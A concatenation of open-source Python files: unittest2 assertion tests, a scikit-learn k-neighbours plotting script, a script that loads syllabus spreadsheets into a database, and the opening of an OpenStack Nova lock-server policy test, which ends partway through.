animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
self.assertIn('a', 'abc')
self.assertIn(2, [1, 2, 3])
self.assertIn('monkey', animals)
self.assertNotIn('d', 'abc')
self.assertNotIn(0, [1, 2, 3])
self.assertNotIn('otter', animals)
self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
self.assertRaises(self.failureException, self.assertIn, 'elephant',
animals)
self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
self.assertRaises(self.failureException, self.assertNotIn, 'cow',
animals)
def testAssertDictContainsSubset(self):
self.assertDictContainsSubset({}, {})
self.assertDictContainsSubset({}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 2}, {'a': 1},
'.*Mismatched values:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'c': 1}, {'a': 1},
'.*Missing:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 1, 'c': 1},
{'a': 1}, '.*Missing:.*')
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictContainsSubset, {'a': 1, 'c': 1},
{'a': 1}, '.*Missing:.*Mismatched values:.*')
self.assertRaises(self.failureException,
self.assertDictContainsSubset, {1: "one"}, {})
def testAssertEqual(self):
equal_pairs = [
((), ()),
({}, {}),
([], []),
(set(), set()),
(frozenset(), frozenset())]
for a, b in equal_pairs:
# This mess of try excepts is to test the assertEqual behavior
# itself.
try:
self.assertEqual(a, b)
except self.failureException:
self.fail('assertEqual(%r, %r) failed' % (a, b))
try:
self.assertEqual(a, b, msg='foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
try:
self.assertEqual(a, b, 'foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with third parameter failed' %
(a, b))
unequal_pairs = [
((), []),
({}, set()),
(set([4,1]), frozenset([4,2])),
(frozenset([4,5]), set([2,3])),
(set([3,4]), set([5,4]))]
for a, b in unequal_pairs:
self.assertRaises(self.failureException, self.assertEqual, a, b)
self.assertRaises(self.failureException, self.assertEqual, a, b,
'foo')
self.assertRaises(self.failureException, self.assertEqual, a, b,
msg='foo')
def testEquality(self):
self.assertListEqual([], [])
self.assertTupleEqual((), ())
self.assertSequenceEqual([], ())
a = [0, 'a', []]
b = []
self.assertRaises(unittest2.TestCase.failureException,
self.assertListEqual, a, b)
self.assertRaises(unittest2.TestCase.failureException,
self.assertListEqual, tuple(a), tuple(b))
self.assertRaises(unittest2.TestCase.failureException,
self.assertSequenceEqual, a, tuple(b))
b.extend(a)
self.assertListEqual(a, b)
self.assertTupleEqual(tuple(a), tuple(b))
self.assertSequenceEqual(a, tuple(b))
self.assertSequenceEqual(tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual,
a, tuple(b))
self.assertRaises(self.failureException, self.assertTupleEqual,
tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual, None, b)
self.assertRaises(self.failureException, self.assertTupleEqual, None,
tuple(b))
self.assertRaises(self.failureException, self.assertSequenceEqual,
None, tuple(b))
self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
self.assertRaises(self.failureException, self.assertSequenceEqual,
1, 1)
self.assertDictEqual({}, {})
c = { 'x': 1 }
d = {}
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictEqual, c, d)
d.update(c)
self.assertDictEqual(c, d)
d['x'] = 0
self.assertRaises(unittest2.TestCase.failureException,
self.assertDictEqual, c, d, 'These are unequal')
self.assertRaises(self.failureException, self.assertDictEqual, None, d)
self.assertRaises(self.failureException, self.assertDictEqual, [], d)
self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
def testAssertEqual_shorten(self):
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 0
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
s = 'x' * 100
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[35 chars]' + 'x' * 61
self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
self.assertEqual(s + 'a', s + 'a')
p = 'y' * 50
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[85 chars]xxxxxxxxxxx'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))
p = 'y' * 100
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[91 chars]xxxxx'
d = 'y' * 40 + '[56 chars]yyyy'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
def testAssertItemsEqual(self):
self.assertItemsEqual([1, 2, 3], [3, 2, 1])
self.assertItemsEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10], [10, 11])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10, 11], [10])
self.assertRaises(self.failureException, self.assertItemsEqual,
[10, 11, 10], [10, 11])
# Test that sequences of unhashable objects can be tested for sameness:
self.assertItemsEqual([[1, 2], [3, 4]], [[3, 4], [1, 2]])
self.assertItemsEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
self.assertRaises(self.failureException, self.assertItemsEqual,
[[1]], [[2]])
# Test unsortable objects
self.assertItemsEqual([2j, None], [None, 2j])
self.assertRaises(self.failureException, self.assertItemsEqual,
[2j, None], [None, 3j])
def testAssertSetEqual(self):
set1 = set()
set2 = set()
self.assertSetEqual(set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
self.assertRaises(self.failureException, self.assertSetEqual, set1, [])
set1 = set(['a'])
set2 = set()
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = set(['a'])
self.assertSetEqual(set1, set2)
set1 = set(['a'])
set2 = set(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = frozenset(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a', 'b'])
set2 = frozenset(['a', 'b'])
self.assertSetEqual(set1, set2)
set1 = set()
set2 = "foo"
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)
# make sure any string formatting is tuple-safe
set1 = set([(0, 1), (2, 3)])
set2 = set([(4, 5)])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
def testInequality(self):
# Try ints
self.assertGreater(2, 1)
self.assertGreaterEqual(2, 1)
self.assertGreaterEqual(1, 1)
self.assertLess(1, 2)
self.assertLessEqual(1, 2)
self.assertLessEqual(1, 1)
self.assertRaises(self.failureException, self.assertGreater, 1, 2)
self.assertRaises(self.failureException, self.assertGreater, 1, 1)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
self.assertRaises(self.failureException, self.assertLess, 2, 1)
self.assertRaises(self.failureException, self.assertLess, 1, 1)
self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)
# Try Floats
self.assertGreater(1.1, 1.0)
self.assertGreaterEqual(1.1, 1.0)
self.assertGreaterEqual(1.0, 1.0)
self.assertLess(1.0, 1.1)
self.assertLessEqual(1.0, 1.1)
self.assertLessEqual(1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)
# Try Strings
self.assertGreater('bug', 'ant')
self.assertGreaterEqual('bug', 'ant')
self.assertGreaterEqual('ant', 'ant')
self.assertLess('ant', 'bug')
self.assertLessEqual('ant', 'bug')
self.assertLessEqual('ant', 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')
# Try Unicode
self.assertGreater(u('bug'), u('ant'))
self.assertGreaterEqual(u('bug'), u('ant'))
self.assertGreaterEqual(u('ant'), u('ant'))
self.assertLess(u('ant'), u('bug'))
self.assertLessEqual(u('ant'), u('bug'))
self.assertLessEqual(u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), u('bug'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertGreaterEqual, u('ant'),
u('bug'))
self.assertRaises(self.failureException, self.assertLess, u('bug'), u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('ant'), u('ant'))
self.assertRaises(self.failureException, self.assertLessEqual, u('bug'), u('ant'))
# Try Mixed String/Unicode
self.assertGreater('bug', u('ant'))
self.assertGreater(u('bug'), 'ant')
self.assertGreaterEqual('bug', u('ant'))
self.assertGreaterEqual(u('bug'), 'ant')
self.assertGreaterEqual('ant', u('ant'))
self.assertGreaterEqual(u('ant'), 'ant')
self.assertLess('ant', u('bug'))
self.assertLess(u('ant'), 'bug')
self.assertLessEqual('ant', u('bug'))
self.assertLessEqual(u('ant'), 'bug')
self.assertLessEqual('ant', u('ant'))
self.assertLessEqual(u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', u('bug'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', u('ant'))
self.assertRaises(self.failureException, self.assertGreater, u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant',
u('bug'))
self.assertRaises(self.failureException, self.assertGreaterEqual, u('ant'),
'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('bug'), 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', u('ant'))
self.assertRaises(self.failureException, self.assertLess, u('ant'), 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', u('ant'))
self.assertRaises(self.failureException, self.assertLessEqual, u('bug'), 'ant')
def testAssertMultiLineEqual(self):
sample_text = u("""\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...]
""")
revised_sample_text = u("""\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...] You may provide your
own implementation that does not subclass from TestCase, of course.
""")
sample_text_error = u("""\
- http://www.python.org/doc/2.3/lib/module-unittest.html
? ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
? ^^^
test case
- A test case is the smallest unit of testing. [...]
+ A test case is the smallest unit of testing. [...] You may provide your
? +++++++++++++++++++++
+ own implementation that does not subclass from TestCase, of course.
""")
self.maxDiff = None
# On python 3 we skip bytestrings as they fail the string
# check. in assertMultiLineEqual
changers = [lambda x: x]
if sys.version_info[0] < 3:
changers.append(lambda x: x.encode('utf8'))
for type_changer in changers:
try:
self.assertMultiLineEqual(type_changer(sample_text),
type_changer(revised_sample_text))
except self.failureException:
e = sys.exc_info()[1]
# need to remove the first line of the error message
error_str = str(e)
if not isinstance(error_str, six.text_type):
error_str = error_str.decode('utf8')
error_lines = error_str.split(u('\n'), 1)
if len(error_lines) > 1:
error = error_lines[1]
else:
error = error_lines[0]
self.assertEqual(sample_text_error, error)
def testAssertSequenceEqualMaxDiff(self):
self.assertEqual(self.maxDiff, 80*8)
seq1 = 'a' + 'x' * 80**2
seq2 = 'b' + 'x' * 80**2
diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
pprint.pformat(seq2).splitlines()))
# the +1 is the leading \n added by assertSequenceEqual
omitted = unittest2.case.DIFF_OMITTED % (len(diff) + 1,)
self.maxDiff = len(diff)//2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertLess(len(msg), len(diff))
self.assertIn(omitted, msg)
self.maxDiff = len(diff) * 2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
self.maxDiff = None
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException:
e = sys.exc_info()[1]
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
def testTruncateMessage(self):
self.maxDiff = 1
message = self._truncateMessage('foo', 'bar')
omitted = unittest2.case.DIFF_OMITTED % len('bar')
self.assertEqual(message, 'foo' + omitted)
self.maxDiff = None
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
self.maxDiff = 4
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
def testAssertDictEqualTruncates(self):
test = unittest2.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertDictEqual({}, {1: 0})
except self.failureException:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'foo')
else:
self.fail('assertDictEqual did not fail')
def testAssertMultiLineEqualTruncates(self):
test = unittest2.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertMultiLineEqual('foo', 'bar')
except self.failureException:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'foo')
else:
self.fail('assertMultiLineEqual did not fail')
def testAssertEqualSingleLine(self):
sample_text = "laden swallows fly slowly"
revised_sample_text = "unladen swallows fly quickly"
sample_text_error = """\
- laden swallows fly slowly
? ^^^^
+ unladen swallows fly quickly
? ++ ^^^^^
"""
try:
self.assertEqual(sample_text, revised_sample_text)
except self.failureException as e:
error = str(e).split('\n', 1)[1]
self.assertEqual(sample_text_error, error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
def testAssertRaisesRegex(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
self.assertRaisesRegex(ExceptionMock, u('expect$'), Stub)
def testAssertNotRaisesRegex(self):
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
self.assertRaisesRegex, Exception, re.compile('x'),
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
self.assertRaisesRegex, Exception, 'x',
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised$',
self.assertRaisesRegex, Exception, u('x'),
lambda: None)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexMismatch(self):
def Stub():
raise Exception('Unexpected')
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, '^Expected$',
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, u('^Expected$'),
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception,
re.compile('^Expected$'), Stub)
@contextlib.contextmanager
def assertNoStderr(self):
with captured_stderr() as buf:
yield
self.assertEqual(buf.getvalue(), "")
def assertLogRecords(self, records, matches):
self.assertEqual(len(records), len(matches))
for rec, match in zip(records, matches):
self.assertIsInstance(rec, logging.LogRecord)
for k, v in match.items():
self.assertEqual(getattr(rec, k), v)
def testAssertLogsDefaults(self):
# defaults: root logger, level INFO
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
self.assertEqual(cm.output, ["INFO:foo:1"])
self.assertLogRecords(cm.records, [{'name': 'foo'}])
def testAssertLogsTwoMatchingMessages(self):
# Same, but with two matching log messages
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'quux'}])
def checkAssertLogsPerLevel(self, level):
# Check level filtering
with self.assertNoStderr():
with self.assertLogs(level=level) as cm:
log_foo.warning("1")
log_foobar.error("2")
log_quux.critical("3")
self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
def checkAssertLogsPerLogger(self, logger):
# Check per-logger filtering
with self.assertNoStderr():
with self.assertLogs(level='DEBUG') as outer_cm:
with self.assertLogs(logger, level='DEBUG') as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'foo.bar'}])
# The outer catchall caught the quux log
self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
def testAssertLogsFailureNoLogs(self):
# Failure due to no logs
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs():
pass
def testAssertLogsFailureLevelTooHigh(self):
# Failure due to level too high
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs(level='WARNING'):
log_foo.info("1")
def testAssertLogsFailureMismatchingLogger(self):
# Failure due to mismatching logger (and the logged message is
# passed through)
with self.assertLogs('quux', level='ERROR'):
with self.assertRaises(self.failureException):
with self.assertLogs('foo'):
log_quux.error("1")
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest2.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest2.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _raise
class Test2(unittest2.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
self.assertRaises(KeyboardInterrupt,
klass('test_something').run)
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest2.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _skip
class Test2(unittest2.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest2.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest2.TestCase):
test_something = _raise
class Test2(unittest2.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest2.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest2.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest2.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
gc.collect()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest2.main()
| apache-2.0 |
mathhun/scipy_2015_sklearn_tutorial | notebooks/figures/plot_kneighbors_regularization.py | 25 | 1363 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsRegressor
def make_dataset(n_samples=100):
rnd = np.random.RandomState(42)
x = np.linspace(-3, 3, n_samples)
y_no_noise = np.sin(4 * x) + x
y = y_no_noise + rnd.normal(size=len(x))
return x, y
def plot_regression_datasets():
fig, axes = plt.subplots(1, 3, figsize=(15, 5))
for n_samples, ax in zip([10, 100, 1000], axes):
x, y = make_dataset(n_samples)
ax.plot(x, y, 'o', alpha=.6)
def plot_kneighbors_regularization():
rnd = np.random.RandomState(42)
x = np.linspace(-3, 3, 100)
y_no_noise = np.sin(4 * x) + x
y = y_no_noise + rnd.normal(size=len(x))
X = x[:, np.newaxis]
fig, axes = plt.subplots(1, 3, figsize=(15, 5))
x_test = np.linspace(-3, 3, 1000)
for n_neighbors, ax in zip([2, 5, 20], axes.ravel()):
kneighbor_regression = KNeighborsRegressor(n_neighbors=n_neighbors)
kneighbor_regression.fit(X, y)
ax.plot(x, y_no_noise, label="true function")
ax.plot(x, y, "o", label="data")
ax.plot(x_test, kneighbor_regression.predict(x_test[:, np.newaxis]),
label="prediction")
ax.legend()
ax.set_title("n_neighbors = %d" % n_neighbors)
if __name__ == "__main__":
plot_kneighbors_regularization()
plt.show()
| cc0-1.0 |
UoMCS/syllabus-visualisation | add_initial_data.py | 1 | 5971 | #!/usr/bin/python
from __future__ import print_function
import sys
import os
import glob
import itertools
import argparse
from flask import Flask
import openpyxl
import requests
from server.app import app
from server.models import *
from server.api import get_categories
# Expected spreadsheet headers
HEADERS = [('A', 'Concept'),
('B', 'Name'),
('C', 'Unit Code'),
('D', 'Taught'),
('E', 'Applied'),
('F', 'Assessed'),
('G', 'Context')]
def to_bool(val):
return (1 if (val == 'y') else 0)
def is_custom(title):
return title.startswith('UOM:')
def is_section(title):
return "#" in title
def normalize_custom_title(title):
""" Applies WP-like normalization to a custom topics title """
return title.replace('_', ' ')
def normalize_wp_title(title):
""" Applies WP normalization to a title, so we get it's canonical form"""
params = {
'action': 'query',
'titles': title,
'format': 'json',
'indexpageids': True
}
r = requests.get('http://en.wikipedia.org/w/api.php', params=params)
responce = r.json()
pageid = responce['query']['pageids'][0]
assert pageid != '-1', 'Title not found'
return responce['query']['pages'][pageid]['title']
def normalize_title(title):
""" Applies correct type of normalization depending on topic type """
if is_custom(title):
return normalize_custom_title(title[4:])
else:
return normalize_wp_title(title)
def process_workbook(workbook):
sheet = openpyxl.load_workbook(workbook).get_active_sheet()
for header in HEADERS:
if sheet.cell('%s1' % header[0]).value != header[1]:
print("Error : Invalid cell in spreadsheet header cell %s" % header[0])
sys.exit(1)
# We couldn't add contexts straight away, as corresponding topics might not
# yet be added. So we parse and save them here, and add after the topics are
# added
topic_contexts = []
for row in range(2,sheet.get_highest_row()+1):
if (sheet.cell('A%d' % row).value):
concept = dict()
for field in HEADERS:
concept[field[1]] = sheet.cell('%s%d' % (field[0], row)).value
# FIXME: Skipping sections for now
if is_section(concept['Concept']):
continue
# Before topic title is normalized - determine if it's custom
is_custom_concept = is_custom(concept['Concept'])
# Name might be just a duplicated identifier - we don't need it then
if concept['Name'] == concept['Concept']:
concept['Name'] = None
concept['Concept'] = normalize_title(concept['Concept'])
# Name might also be a normalized identifier - we don't need it either
if concept['Name'] == concept['Concept']:
concept['Name'] = None
topic, is_topic_new = None, None
if is_custom_concept:
topic = db.session.query(CustomTopic).filter_by(name=concept['Concept']).first()
is_topic_new = not topic
if is_topic_new:
topic = CustomTopic(concept['Concept'])
topic.description = 'Added from spreadsheets'
else:
topic = db.session.query(Topic).filter_by(name=concept['Concept']).first()
is_topic_new = not topic
if is_topic_new:
topic = Topic(concept['Concept'])
topic.categories = get_categories(topic)
if is_topic_new:
db.session.add(topic)
db.session.flush()
unit = db.session.query(Unit).filter_by(code=concept['Unit Code']).one()
unit_topic = UnitTopic(unit.id, topic.id)
unit_topic.alias = concept['Name']
unit_topic.is_taught = to_bool(concept['Taught'])
unit_topic.is_assessed = to_bool(concept['Assessed'])
unit_topic.is_applied = to_bool(concept['Applied'])
db.session.add(unit_topic)
db.session.commit()
if concept['Context']:
contexts = concept['Context'].split()
# FIXME: Remove sections for now
contexts = itertools.ifilterfalse(is_section, contexts)
# Normalise titles
contexts = map(normalize_title, contexts)
topic_contexts.append((unit_topic.id, contexts))
# Some lazy progress reporting
sys.stdout.write('.')
sys.stdout.flush()
for unit_topic_id, contexts in topic_contexts:
unit_topic = db.session.query(UnitTopic).filter_by(id=unit_topic_id).one()
unit_topic.contexts = db.session.query(Topic).filter(Topic.name.in_(contexts)).all()
print('Done')
def insert_units(units_filename):
with open(units_filename) as f:
for unit_line in f:
code, name = map(str.strip, unit_line.split(',', 1))
unit = Unit(code,name)
db.session.add(unit)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Insert initial data from spreadsheets')
parser.add_argument('db_uri', help='Database URI to insert to (e.g. sqlite:///test.db)')
parser.add_argument('data_dir', help='Directory with initial data')
args = parser.parse_args()
app.config['SQLALCHEMY_DATABASE_URI'] = args.db_uri
with app.app_context():
db.drop_all()
db.create_all()
units_filename = os.path.join(args.data_dir, 'units.txt')
insert_units(units_filename)
db.session.commit()
spreadsheets = glob.glob(os.path.join(args.data_dir, '*.xlsx'))
for workbook in spreadsheets:
print('Processing ' + workbook)
process_workbook(workbook)
db.session.commit()
| mit |
openstack/nova | nova/tests/unit/policies/test_lock_server.py | 3 | 10320 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.api.openstack.compute import lock_server
from nova.compute import vm_states
from nova import exception
from nova.policies import base as base_policy
from nova.policies import lock_server as ls_policies
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.policies import base
class LockServerPolicyTest(base.BasePolicyTest):
"""Test Lock server APIs policies with all possible context.
This class defines the set of context with different roles
which are allowed and not allowed to pass the policy checks.
With those set of context, it will call the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(LockServerPolicyTest, self).setUp()
self.controller = lock_server.LockServerController()
self.req = fakes.HTTPRequest.blank('')
user_id = self.req.environ['nova.context'].user_id
self.mock_get = self.useFixture(
fixtures.MockPatch('nova.api.openstack.common.get_instance')).mock
uuid = uuids.fake_id
self.instance = fake_instance.fake_instance_obj(
self.project_member_context,
id=1, uuid=uuid, project_id=self.project_id,
user_id=user_id, vm_state=vm_states.ACTIVE,
task_state=None, launched_at=timeutils.utcnow())
self.mock_get.return_value = self.instance
# Check that admin or and server owner is able to lock/unlock
# the server
self.admin_or_owner_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context, self.project_member_context,
self.project_reader_context, self.project_foo_context]
# Check that non-admin/owner is not able to lock/unlock
# the server
self.admin_or_owner_unauthorized_contexts = [
self.system_member_context, self.system_reader_context,
self.system_foo_context,
self.other_project_member_context,
self.other_project_reader_context,
]
# Check that admin is able to unlock the server which is
# locked by other
self.admin_authorized_contexts = [
